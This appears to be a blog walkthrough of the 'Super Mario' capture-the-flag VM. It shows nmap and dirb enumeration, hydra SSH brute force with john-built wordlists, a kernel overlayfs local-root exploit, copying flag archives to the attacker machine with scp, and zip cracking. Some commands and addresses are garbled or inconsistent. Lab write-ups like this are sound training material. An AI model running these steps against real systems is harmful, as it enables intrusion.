Hello
friends!! Might you people have played THE SUPER MARIO game once in your
childhood and no wonder if a thought have been strike in your mind to hack the
game. So whatever you had thought today we are going to make it true and for
that you guys need to download the new VM machine for super Mario from here.
The
credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag
inside this lab as a challenge for hackers. The level of the challenge is
Intermediate.
Let’s breach!!!
As
you know we always start with enumeration, therefore open the terminal in your
kali Linux and go for aggressive scan with nmap.
Nmap –p- -A
192.168.0.5
Since port 22 and port 8180 for service SSH and HTTP
respectively therefore I choose port 8081 for enumeration but from screenshot
you can see I didn’t get any remarkable result.
Dirb
http://192.168.0.5:8180
Then I move for directory brute force attack using
following command
Dirb
http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt
In the given below screenshot you can read it has shown a
file name vhosts, let’s explore it
through browser.
Now
explore vhost in URL as http://192.168.0.5:8180/vhosts
here vhosts stand for virtual host it is method for hosting multiple domain on
a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local
Let’s add mario.supermariohost.local
into /etc as new localhost
Cd etc
Vim hosts
Now
type “192.168.0.5
mario.supermariohost.local” inside
the vim editor to add it in the /etc/host and after then type wq to save it.
Now Type Cat hosts
to check added host name Hence you from screenshot you can see it has been had
added inside it successfully.
Then I visit mario.supermariohost.local
on browser and finally got Mario as browser game but it is not working.
Since
we know port 22 and 8081 was open and we didn’t get much information from
enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore
I had prepared a dictionary in order to retrieve credential to login inside SSH
server.
Dictionary contains username which was the famous character
of MARIO, you can check these name from Google also.
Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.
Use john the ripper to generate dictionary of password using
following command here –rules will
enable the wordlist and --stdout
will define a fix length of password to be generate on the desktop as pass.
John –wordlist : user
–rules –stdout > pass
Finally
we have username dictionary as user
and password dictionary generated by john as pass, now we have to match perfect combination of user and pass in
order to retrieve credential for SSH login. I had chosen hydra for password
cracking, you can choose any other password cracking tool also.
Hydra –L user –P pass 192.168.0.5 ssh
From
the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.
Now type following for SSH login
Password luigi1
Yeeppiii!!!! Finally we have login inside SSH server.
Uname –a
Here we come to know that the version for linux supermariohost 3.13.0; let’s checkout its exploit on Google.
Yes,
there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from here
inside your kali Linux.
Form
screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation.
Now type following command for downloading Mario.c inside
target system.
The file is successfully downloaded inside it now type
another command to compile Mario.c
Gcc Mario.c –o
mario
./Mario
Id
Cd/root
Ls
Awesome!!! We
have got root privilege and from screenshot you can see inside its directory I
have got zip file as flag.zip
Now type following command to download flag.zip on the
desktop of your kali Linux
Scp /root/flag.zip
root@192.168.0.6:/root/Desktop
Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt
-u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.
Unzip flag.zip
It will ask for password, give above password to unzip it
and again if you notice the given image it contains flag.txt
Cat flag.txt
1st
FLAG: Well done: D If you reached this it means you got root,
congratulations.
Now follow the given below step in order to complete
another challenge.
Iptables –L
Here from screenshot you can see a new network has been
added on remote system.
Arp –n
Now the target system has been forwarded on a new IP 192.168.122.112
Ls -la
Found a directory .bak
Cd /.bak
Ls
Cd users
Cd luigi
Ls
There are two files inside it let’s read them one by one
Cat message
Hi Luigi,
Since you've been messing around with my host, at this
point I want to return the favour.
This is a "war", you "naughty" boy!
Cat id_rsa.pub
The highlighted word in the given text may appear like a
username for login into SSH server.
Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112
Great!! All
assumption had given positive result
Again check for kernel version
Uname -a
Woooww!! It is
same version now we can use our Mario.c exploit for root privilege. Hence
repeat the above step as shown in images.
The file is successfully downloaded inside it now type
another command to compile Mario.c
Gcc Mario.c –o Mario
./Mario
Id
Cd /root
Ls –la
Here I found two important files 1st hint.txt 2nd flag2.zip before going for unzip
flag.zip we must look towards hint.txt file.
Cat .hint.txt
“Peach Loves Me”
it might be the password key for decrypting the flag2.zip file
Now let download fla2g.zip on the desktop of kali Linux
by using following again
Scp /root/flag2.zip
root@192.168.0.6:/root/Desktop
Unzip flag2.zip
Now when it will ask for password key type “Peach Loves Me”
It contains flag2.txt inside type cat flag2.txt to open this file.
2nd
FLAG: Congratulations on your second flag!
Wonderful!!! We
have caught both flags
0 comments:
Post a Comment